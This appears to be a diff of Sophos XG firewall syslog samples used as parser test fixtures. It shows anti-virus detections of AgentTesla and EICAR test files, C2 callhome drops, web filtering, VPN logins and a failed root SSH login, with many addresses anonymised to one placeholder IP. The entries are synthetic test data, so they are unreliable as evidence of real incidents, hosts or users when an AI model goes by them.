from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" 
device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=175.16.199.1 src_country_code=USA 
dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" <30>device="SFW" date=2018-06-06 time=10:51:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036106211001 log_type="Anti-Virus" log_component="POPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="pankhil@postman.local" subject="EICAR" mailid="" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=10:58:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036206212001 log_type="Anti-Virus" log_component="IMAPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="ganga@postman.local" subject="EICAR test email" mailid="<2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-21 time=19:50:23 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031006209001 log_type="Anti-Virus" log_component="FTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" virus="EICAR-AV-Test" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Upload" filename=" /home/ftp-user/ta_test_file_1ta-cl1-46" file_size=0 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" 
ftpcommand="STOR" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol="TCP" src_port=39910 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2018-06-21 time=19:50:48 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031001609002 log_type="Anti-Virus" log_component="FTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" virus="" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Download" filename="/home/ftp-user /ta_test_file_1ta-cl1-46" file_size=19926248 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="RETR" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol="TCP" src_port=39936 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=19926248 -<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=46.161.30.47 url=46.161.30.47 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" 
log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=82.211.30.202 url=82.211.30.202 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" -<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 
domain=hanuman.com exceptions= activityname="" -<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" -<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://40.90.137.127/" contenttype="" override_token="" httpresponsecode="" 
src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" 
ep_uuid= execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" +<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=175.16.199.1 
protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" +<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname="" +<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" +<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" 
activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://175.16.199.1/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" 
transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SF01V" device_id=1234567890123456 log_id=058420116010 log_type="Content Filtering" log_component="Web Content Policy" log_subtype="Alert" user="gi123456" src_ip=10.108.108.49 transaction_id="e4a127f7-a850-477c-920e-a471b38727c1" dictionary_name="complicated_Custom" site_category=Information Technology website="ta-web-static-testing.qa. astaro.de" direction="in" action="Deny" file_name="cgi_echo.pl" context_match="Not" context_prefix="blah blah hello " context_suffix=" hello blah " -<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" -<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca 
exceptions= activityname="Search" reason="not eligible" -<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=172.17.35.116 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116" name="elastic.user@elastic.test.com" src_mac= -<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=83.20.132.250 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)" +<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" +<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" 
log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible" +<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1" name="elastic.user@elastic.test.com" src_mac= +<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=175.16.199.1 localgateway="" localnetwork="175.16.199.1/19" remoteinterfaceip=175.16.199.1 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)" <30>device="SFW" date=2020-05-18 time=14:38:59 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511318057 log_type="Event" log_component="IPSec" log_subtype="System" status="Expire" priority=Error user_name="" connectionname="" connectiontype="0" localinterfaceip="" localgateway="" localnetwork="" remoteinterfaceip="" remotenetwork="" message="IKE_SA 
timed out before it could be established" -<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=83.9.140.96 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:01 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=064011517819 log_type="Event" log_component="Anti-Virus" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.407794 newversion=1.0.407795 message="Avira AV definitions upgraded from 1.0.407794 to 1.0.407795." 
<30>device="SFW" date=2020-05-18 time=14:39:02 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=063411660022 log_type="Event" log_component="DHCP Server" log_subtype="System" status="Expire" priority=Information ipaddress="192.168.110.10" client_physical_address="-" client_host_name="" message="Lease 192.168.110.10 expired" raw_data="192.168.110.10" -<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=217.250.157.135 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:04 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062811617824 log_type="Event" log_component="SSL VPN" log_subtype="System" priority=Information Mode="Remote Access" sessionid="" starttime=0 user_name="elastic.user@elastic.test.com" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status="Established" message="SSL VPN User 'elastic.user@elastic.test.com' connected " timestamp=1589960866 connectionname="" remote_ip=10.82.234.12 -<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" 
device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=91.67.201.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=175.16.199.1 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:06 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=066911518017 log_type="Event" log_component="ATP" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.0297 newversion=1.0.0298 message="ATP definitions upgraded from 1.0.0297 to 1.0.0298." 
<30>device="SFW" date=2020-05-18 time=14:39:07 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062009617502 log_type="Event" log_component="GUI" log_subtype="Admin" status="Successful" priority=Information user_name="admin" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message="SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'" -<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=172.66.35.15 message="User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials" +<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=175.16.199.1 message="User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials" <30>device="SFW" date=2020-05-18 time=14:39:09 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063911517818 log_type="Event" log_component="IPS" log_subtype="System" priority=Notice status="Successful" 